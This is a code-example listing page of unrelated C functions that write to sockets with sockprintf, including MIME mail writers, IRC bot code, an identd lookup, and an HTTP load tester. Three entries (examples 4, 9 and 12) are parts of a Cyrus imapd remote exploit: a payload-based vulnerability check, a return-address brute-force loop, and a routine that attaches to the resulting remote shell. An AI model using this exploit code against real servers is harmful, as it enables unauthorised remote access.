Esempio n. 1
0
void mimetextpartheader(SOCKET socket, char* boundary)
{
    sockprintf(socket,"--%s",boundary);
    sockprintf(socket,"Content-Type: text/plain;");
    sockprintf(socket," charset=\"iso-8859-1\"");
    sockprintf(socket,"Content-Transfer-Encoding: 7bit");
}
Esempio n. 2
0
void vsend_cmd(const char *source, const char *fmt, va_list args)
{
    char buf[BUFSIZE];

    vsnprintf(buf, sizeof(buf), fmt, args);
    if (source) {
	sockprintf(servsock, ":%s %s\r\n", source, buf);
	if (debug)
	    log("debug: Sent: :%s %s", source, buf);
    } else {
	sockprintf(servsock, "%s\r\n", buf);
	if (debug)
	    log("debug: Sent: %s", buf);
    }
}
Esempio n. 3
0
void proto_connect() {
	{
		struct addrinfo *info = get_addr_info(bot->host, bot->port);

		bot->socket = getsock(info);
		fcntl(bot->socket, F_SETFL, O_NONBLOCK);
		bot->running = 1;

		// we won't need this anymore.
		freeaddrinfo(info);
	}

	printf("[irc\tinfo] registering with the server.\n");
	sockprintf(bot->socket, "NICK %s", bot->nick);
	sockprintf(bot->socket, "USER apollo * * :hi i'm apollo");
}
Esempio n. 4
0
void vulnchck(struct sockaddr_in addr, int port){
    char payload[1024];
    int sock;
    struct timeval timeout;
    fd_set fds;

    timeout.tv_sec = 3;
    timeout.tv_usec = 0;

    printf("[!] Checking if the server is vuln!\n");
    if((sock = conn(addr, port)) == -1){
        printf("[-] Connecting failed!\n");
        exit(1);
    }
    gen_payload(payload, sizeof(payload), 0x00, 0);
    sockprintf(sock, "%s\r\n", payload);
    if(recv(sock, payload, sizeof(payload), 0) < 1){
        printf("[+] Yeaahaa server is vuln, lets f**k that bitch!\n");
        close(sock);
        return;
    }
    printf("[-] Server not vuln!\n");
    close(sock);
    exit(1);
}
Esempio n. 5
0
void irc_invite(struct bot *bot, struct message *msg) {
	char *args = strdup(msg->arg);
	char *chan = last(args);

	sockprintf(bot->socket, "JOIN :%s", chan+1);

	free(args);
	free(chan);
}
Esempio n. 6
0
/**
 * actually Send a command to the server.
 * @param source Orgin of the Message (some times NULL)
 * @param fmt Format of the Message
 * @param args List of the arguments
 * @return void
 */
void vsend_cmd(const char *source, const char *fmt, va_list args)
{
    char buf[BUFSIZE];
    *buf = '\0';

    if (fmt) {
        vsnprintf(buf, BUFSIZE - 1, fmt, args);

        if (source) {
            sockprintf(servsock, ":%s %s\r\n", source, buf);
            eventprintf(":%s %s", source, buf);
            if (debug) {
                alog("debug: Sent: :%s %s", source, buf);
            }
        } else {
            sockprintf(servsock, "%s\r\n", buf);
            eventprintf("%s", buf);
            if (debug) {
                alog("debug: Sent: %s", buf);
            }
        }
    }
}
Esempio n. 7
0
BOOL mimeattach(SOCKET socket, char* boundary, char* pathfile)
{
    char* fname = getfname(pathfile);

    sockprintf(socket,"--%s",boundary);
    sockprintf(socket,"Content-Type: application/octet-stream;");
    sockprintf(socket," name=\"%s\"",fname);
    sockprintf(socket,"Content-Transfer-Encoding: base64");
    sockprintf(socket,"Content-Disposition: attachment;");
    sockprintf(socket," filename=\"%s\"",fname);
    sockprintf(socket,"");
    if(!base64out(socket,pathfile))
        return(FALSE);
    sockprintf(socket,"");
    return(TRUE);
}
Esempio n. 8
0
BOOL base64out(SOCKET socket, char* pathfile)
{
    FILE *  fp;
    char    in[57];
    char    out[77];
    int     bytesread;

    if((fp=fopen(pathfile,"rb"))==NULL)
        return(FALSE);
    while(1) {
        bytesread=fread(in,1,sizeof(in),fp);
        if((b64_encode(out,sizeof(out),in,bytesread)==-1)
                || !sockprintf(socket,out))  {
            fclose(fp);
            return(FALSE);
        }
        if(bytesread!=sizeof(in) || feof(fp))
            break;
    }
    fclose(fp);
    sockprintf(socket,"");
    return(TRUE);
}
Esempio n. 9
0
int get_shell(struct sockaddr_in addr, int port, int sleeps){
    int sock;
    char buffer[1024];
    fd_set fds;

    sleep(sleeps);

    if((sock = conn(addr, port)) == -1)
        return (-1);
    printf("[+]\n[+] Wooohooo we got a shell!\n");
    sockprintf(sock, SHELL_COMMAND"\r\n");
    while(1){
        FD_ZERO(&fds);
        FD_SET(0, &fds);
        FD_SET(sock, &fds);

        if (select(255, &fds, NULL, NULL, NULL) == -1){
            fprintf(stderr,"[-] sending failed\n");
            close(sock);
            exit(1);
        }

        memset(buffer, 0x0, sizeof(buffer));
        if (FD_ISSET(sock, &fds)){
            if (recv(sock, buffer, sizeof(buffer), 0) == -1){
                fprintf(stderr, "[-] Connection closed by remote host!\n");
                close(sock);
                exit(1);
            }
            fprintf(stderr, "%s", buffer);
        }

        if (FD_ISSET(0, &fds)){
            read(0, buffer, sizeof(buffer));
            write(sock, buffer, strlen(buffer));
        }
    }
    return 0;
}
Esempio n. 10
0
void hua_show(int fd)
{
    int h, u;
    char buf[2048];
    int labeldone;
    int sensor;
    x10secsensor_t *sen;

    sockprintf(fd, "Device selected\n");
    for (h = 0; h < 16; h++) {
        labeldone = 0;
        buf[0] = '\0';
        for (u = 0; u < 16; u++) {
            if (HouseUnitSelected[h][u]) {
                if (!labeldone) {
                    labeldone = 1;
                    snprintf(buf+strlen(buf), sizeof(buf)-strlen(buf), 
                            "House %c: %d", h+'A', u+1);
                }
                else 
                    snprintf(buf+strlen(buf), sizeof(buf)-strlen(buf), 
                            ",%d", u+1);
            }
        }
        if (labeldone) {
            strcat(buf, "\n");
            sockprintf(fd, buf, strlen(buf));
        }
    }
    
    sockprintf(fd, "Device status\n");
    for (h = 0; h < 16; h++) {
        labeldone = 0;
        buf[0] = '\0';
        for (u = 0; u < 16; u++) {
            if (HouseUnitState[h][u]) {
                if (!labeldone) {
                    labeldone = 1;
                    snprintf(buf+strlen(buf), sizeof(buf)-strlen(buf), 
                            "House %c: %d=%c", h+'A', u+1, HouseUnitState[h][u]);
                }
                else
                    snprintf(buf+strlen(buf), sizeof(buf)-strlen(buf), 
                            ",%d=%c", u+1, HouseUnitState[h][u]);
            }
        }
        if (labeldone) {
            strcat(buf, "\n");
            sockprintf(fd, buf, strlen(buf));
        }
    }
    sockprintf(fd, "Security sensor status\n");
    qsort(X10sensors, X10sensorcount, sizeof(X10sensors[0]), cmpX10sensor);
    for (sensor = 0; sensor < X10sensorcount; sensor++) {
        time_t deltat, mins;
        const char *message;

        sen = &X10sensors[sensor];
        deltat = time(NULL) - sen->lastupdate;
        mins = deltat / 60;
        deltat = deltat - (mins * 60);
        if (sen->secaddr8)
            message = findSecRemoteKeyName(sen->sensorstatus);
        else
            message = findSecEventName(sen->sensorstatus);
        sockprintf(fd, "Sensor addr: %06X Last: %02d:%02d %s \n", sen->secaddr,
                mins, deltat, message);
    }

    sockprintf(fd, "End status\n");
}
Esempio n. 11
0
void proto_tick() {
	int nbytes;
	char data[BUFSIZE/2];

	while (bot->running) {
		memset(&data, 0, BUFSIZE/2);

tick:
		tick_functions();

		recv:
		if ((nbytes = recv(bot->socket, data, (BUFSIZE/2)-1, 0)) == -1) {
			if (errno == EINTR) {
				// what a pain in the ass,
				// we got interrupted >.>
				goto recv;
			}

			if (errno == EAGAIN) {
				usleep(16666);
				goto tick;
			}


			perror("recv failed");
			exit(4);
		}

		strcat(bot->buffer, data);

		if (nbytes == 0) {
			bot->running = 0;
		}

		char *i = irc_getline(bot);
		if (i == NULL) {
			return;
		}

		for (; i != NULL; i = irc_nextline(bot)) {

			printf("%s\n", i);

			if (startswith(i, "PING")) {
				char *t = last(i);
				sockprintf(bot->socket, "PONG %s", t);
				free(t);
				free(i);
				continue;
			}

			struct message *msg = parse(i);

			if (EQ(msg->meth, "422") || EQ(msg->meth, "376")) {
				sockprintf(bot->socket, "JOIN #bots");
			}

			Link *handlers = hashmap_get(msg->meth, bot->handlers);
			for (Link *i = handlers; i != NULL; i = i->next) {
				((handler_t)i->ptr)(bot, msg);
			}
			freemsg(msg);
			free(i);
		}
	}
}
Esempio n. 12
0
int main(int argc, char **argv){
    char *payload = NULL, *hostn = NULL, buffer[1024], *ptr;
    int i, first, sock, opt, target = 0, port = 143,
        shell_port = atoi(SHELL_PORT), sleeps = 1, 
        p_size=10000, ret_bf_start = RET_BF_START, 
        ret_bf_end = RET_BF_END, vulncheck = 1; 
    fd_set fds;
	struct sockaddr_in addr;
  
    printf("[!] Cyrus imapd 2.2.4 - 2.2.8 remote exploit by crash-x / unl0ck\n");

    if (argc < 2)
        usage(argv[0]);
    
    while ((opt = getopt (argc, argv, "h:p:t:s:P:S:E:vV")) != -1){
        switch (opt){
	        case 'h':
	            hostn = optarg;
	            break;
	        case 'p':
                port = atoi(optarg);
                if(port > 65535 || port < 1){
                    printf("[-] Port %d is invalid\n",port);
                    return 1;
                }
                break;
            case 't':
                target = atoi(optarg);
                for(i = 0; targets[i].platform; i++);
                if(target >= i && target != 1337){
                    printf("[-] Wtf are you trying to target?\n");
                    usage(argv[0]);
                }
                break;
            case 'S':
                ret_bf_start = strtoul(optarg,NULL,0);
                if(!ret_bf_start){
                    printf("[-] Wtf thats not a valid bruteforce start address!\n");
                    usage(argv[0]);
                }
                break;
            case 'E':
                ret_bf_end = strtoul(optarg,NULL,0);
                if(!ret_bf_end){
                    printf("[-] Wtf thats not a valid bruteforce end address!\n");
                    usage(argv[0]);
                }
                break;
            case 's': 
                sleeps = atoi(optarg);
                break;
            case 'P': 
                p_size = atoi(optarg);
                if(p_size < 1000){
                    printf("[-] Its a bad idea to have a payload with less than 1000 bytes :)\n");
                    return 1;
                }
                break;
            case 'v':
                vulncheck = 2;
                break;
            case 'V':
                vulncheck = 0;
                break;
        	default:
                usage(argv[0]);
        }
    }

    if(hostn == NULL)
        usage(argv[0]);

    if(payload == NULL){
        if(!(payload = malloc(p_size))){
            printf("[-] Wasnt able to allocate space for the payload!\n");
            return 1;
        }
    }

    resolv(&addr, hostn);

    if(vulncheck == 2){
        vulnchck(addr, port);
        return 1;
    }
    else if(vulncheck == 1)
        vulnchck(addr, port);

    if(target != 1337){
        ret_bf_start = targets[target].retloc;
        ret_bf_end = targets[target].retloc+5;
        printf ("[!] Targeting %s\n", targets[target].platform);
    } else
        printf("[!] Starting bruteforce attack!\n");

    for(i = 0, first = 1; ret_bf_start < ret_bf_end; i++, first++){
        if((sock = conn(addr, port)) == -1){
            if(first != 1)
                printf("\n");
            printf("[-] Connecting failed!\n");
            break;
        }
        if(i == 4)
            ret_bf_start += (p_size -  (p_size/10));
        else
            ret_bf_start++;
        gen_payload(payload, p_size, ret_bf_start, 1);
        status(ret_bf_start, ret_bf_start + (p_size - (p_size/10)),
                ret_bf_start + (p_size - (p_size/10/2)));
        sockprintf(sock, "%s\r\n", payload);
        if(i == 4){
            get_shell(addr, shell_port, sleeps);
            i = 0;
        }
        if(ret_bf_start >=  ret_bf_end)
            printf("[-]\n");
        close(sock);
    }
    printf("[-] Exploit failed!\n");
    return 1;
}
Esempio n. 13
0
int masq(	int sock,
			in_port_t lport,
			in_port_t fport,
			struct sockaddr_storage *laddr,
			struct sockaddr_storage *faddr)
{
	nat_t *np;
	nat_t nat;
	char os[24];
	char user[MAX_ULEN];
	struct sockaddr_storage ss;

	/*
	** Only IPv4 is supported right now..
	*/

	if (faddr->ss_family != AF_INET || laddr->ss_family != AF_INET)
		return (-1);

	if (getbuf(kinfo->nl[N_NATLIST].n_value, &np, sizeof(np)) == -1)
		return (-1);

	for (; np != NULL ; np = nat.nat_next) {
		int ret;
		in_port_t masq_lport;

		if (getbuf((u_long) np, &nat, sizeof(nat)) == -1) {
			debug("getbuf: %s", strerror(errno));
			break;
		}

		if (nat.nat_p != IPPROTO_TCP)
			continue;

		if (lport != nat.nat_outport)
			continue;

		if (fport != nat.nat_oport)
			continue;

		if (SIN4(laddr)->sin_addr.s_addr != nat.nat_outip.s_addr)
			continue;

		if (SIN4(faddr)->sin_addr.s_addr != nat.nat_oip.s_addr) {
			if (!opt_enabled(PROXY))
				continue;

			if (SIN4(faddr)->sin_addr.s_addr != SIN4(&proxy)->sin_addr.s_addr)
				continue;

			if (SIN4(laddr)->sin_addr.s_addr == SIN4(&proxy)->sin_addr.s_addr)
				continue;
		}

		lport = ntohs(lport);
		fport = ntohs(fport);
		masq_lport = ntohs(nat.nat_inport);

		sin_setv4(nat.nat_inip.s_addr, &ss);

		if (opt_enabled(FORWARD)) {
			ret = fwd_request(sock, lport, masq_lport, fport, &ss);

			if (ret == 0)
				return (0);
			else {
				char ipbuf[MAX_IPLEN];

				get_ip(&ss, ipbuf, sizeof(ipbuf));

				debug("Forward to %s (%d %d | %d %d) failed",
					ipbuf, lport, fport, nat.nat_inport, nat.nat_outport);
			}
		}

		ret = find_masq_entry(&ss, user, sizeof(user), os, sizeof(os));
		if (ret == 0) {
			char ipbuf[MAX_IPLEN];

			sockprintf(sock, "%d , %d : USERID : %s : %s\r\n",
				lport, fport, os, user);

			get_ip(faddr, ipbuf, sizeof(ipbuf));

			o_log(NORMAL,
				"[%s] (NAT) Successful lookup: %d , %d : %s",
				ipbuf, lport, fport, user);

			return (0);
		}
	}

	return (-1);
}
Esempio n. 14
0
int WINAPI ClientMain(void * clientNo) {

    SOCKET soc;
    time_t lastData;
    size_t totalData = 0;
    size_t bodyData = 0;
    int isBody = 0;
    int isTest = (clientNo == 0);
    int cpu = ((int)clientNo) % 100;
    int timeOut = 10;
    const char * resource = 0;
    const char * method = 0;
    unsigned long i, j;

    // Method: PUT or GET
    if (METHODINDEX < sizeof(METHODLIST)/sizeof(METHODLIST[0])) {
        method = METHODLIST[METHODINDEX];
    }
    if (method == 0) {
        EnterCriticalSection(&cs);
        printf("\r\nClient %u: bad method\a\r\n", (int)clientNo);
        LeaveCriticalSection(&cs);
        return 1;
    }

    // Resource
    if (RESOURCEINDEX < sizeof(RESOURCELIST)/sizeof(RESOURCELIST[0])) {
        resource = RESOURCELIST[RESOURCEINDEX];
    }
    if (resource == 0) {
        EnterCriticalSection(&cs);
        printf("\r\nClient %u: bad resource\a\r\n", (int)clientNo);
        LeaveCriticalSection(&cs);
        return 2;
    }

    // CPU
    if ((!isTest) && (((1ULL<<cpu) & availableCPUs)!=0)) {
        SetThreadAffinityMask(GetCurrentThread(), 1ULL<<cpu);
    }

    // TCP
    soc = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
    if (soc==INVALID_SOCKET) {
        EnterCriticalSection(&cs);
        printf("\r\nClient %u: cannot create socket\a\r\n", (int)clientNo);
        LeaveCriticalSection(&cs);
        return 3;
    }

    // comment in to disable Nagle:
    {int disable_Nagle = 1; setsockopt(soc, IPPROTO_TCP, TCP_NODELAY, (char *) &disable_Nagle, sizeof(disable_Nagle));}

    if (connect(soc, (SOCKADDR*)&target, sizeof(target))) {
        EnterCriticalSection(&cs);
        printf("\r\nClient %u: cannot connect to server %s:%u\a\r\n", (int)clientNo, HOST, PORT);
        LeaveCriticalSection(&cs);
        return 4;
    }

    for (j=0; j<((keep_alive>0)?keep_alive:1); j++) {

        // HTTP request
        if (queryStringSize>0) {
            sockprintf(soc, "%s %s?", method, resource);

            for (i=0;i<(queryStringSize/10);i++) {sockprintf(soc, "1234567890");}
            for (i=0;i<(queryStringSize%10);i++) {sockprintf(soc, "_");}

            sockprintf(soc, " HTTP/1.1\r\nHost: %s\r\n", HOST);
        } else {
            sockprintf(soc, "%s %s HTTP/1.1\r\nHost: %s\r\n", method, resource, HOST);
        }
        if (keep_alive) {
            sockprintf(soc, "Connection: Keep-Alive\r\n");
        } else {
            sockprintf(soc, "Connection: Close\r\n");
        }

        for (i=0;i<(extraHeadSize/25);i++) {sockprintf(soc, "Comment%04u: 1234567890\r\n", i % 10000);} /* omit (extraHeadSize%25) */

        if (!strcmp(method,"GET")) {
            sockprintf(soc, "\r\n");
        } else if (chunked) {

            sockprintf(soc, "Transfer-Encoding: chunked\r\n\r\n", postSize);

            for (i=0;i<(postSize/10);i++) {sockprintf(soc, "A\r\n1234567890\r\n");}
            if ((postSize%10)>0) {
                sockprintf(soc, "%x\r\n", postSize%10);
                for (i=0;i<(postSize%10);i++) {sockprintf(soc, "_");}
                sockprintf(soc, "\r\n");
            }

        } else {
            // not GET
            sockprintf(soc, "Content-Length: %u\r\n\r\n", postSize);

            for (i=0;i<postSize/10;i++) {sockprintf(soc, "1234567890");}
            for (i=0;i<postSize%10;i++) {sockprintf(soc, ".");}

            timeOut += postSize/10000;
        }

        if (!keep_alive) {
            shutdown(soc, SD_SEND);
        } else {
            timeOut = 2;
        }

        // wait for response from the server
        bodyData = totalData = 0;
        isBody = 0;
        lastData = time(0);
        for (;;) {
            char buf[20480];
            int chunkSize = 0;
            unsigned long dataReady = 0;

            Sleep(1);

            if (ioctlsocket(soc, FIONREAD, &dataReady) < 0) break;
            if (dataReady) {
                chunkSize = recv(soc, buf+totalData, sizeof(buf)-totalData, 0);
                if (chunkSize<0) {
                    printf("Error: recv failed for client %i\r\n", (int)clientNo);
                    break;
                } else if (!isBody) {
                    char * headEnd = strstr(buf,"\xD\xA\xD\xA");
                    if (headEnd) {
                        headEnd+=4;
                        chunkSize -= ((int)headEnd - (int)buf);
                        if (chunkSize>0) {
                            //fwrite(headEnd,1,got,STORE);
                            bodyData += chunkSize;
                        }
                        isBody=1;
                    }
                } else {
                    //fwrite(buf,1,got,STORE);
                    bodyData += chunkSize;
                }
                lastData = time(0);
                totalData += chunkSize;
            } else {
                time_t current = time(0);
                if (difftime(current, lastData) > timeOut) {
                    break;
                }
                Sleep(10);
            }
        }


        EnterCriticalSection(&cs);
        if (isTest) {
            expectedData = totalData;
        } else if (totalData != expectedData) {
            printf("Error: Client %u got %u bytes instead of %u\r\n", (int)clientNo, totalData, expectedData);
            bad++;
        } else {
            good++;
        }
        LeaveCriticalSection(&cs);

        if (keep_alive) {
            Sleep(10);
        }
    }

    shutdown(soc, SD_BOTH);
    closesocket(soc);

    return 0;
}
Esempio n. 15
0
void mimeblurb(SOCKET socket, char* boundary)
{
    sockprintf(socket,"This is a multi-part message in MIME format.");
    sockprintf(socket,"");
}
Esempio n. 16
0
void mimeheaders(SOCKET socket, char* boundary)
{
    sockprintf(socket,"MIME-Version: 1.0");
    sockprintf(socket,"Content-Type: multipart/mixed;");
    sockprintf(socket," boundary=\"%s\"",boundary);
}
Esempio n. 17
0
void endmime(SOCKET socket, char* boundary)
{
    /* last boundary */
    sockprintf(socket,"--%s--",boundary);
    sockprintf(socket,"");
}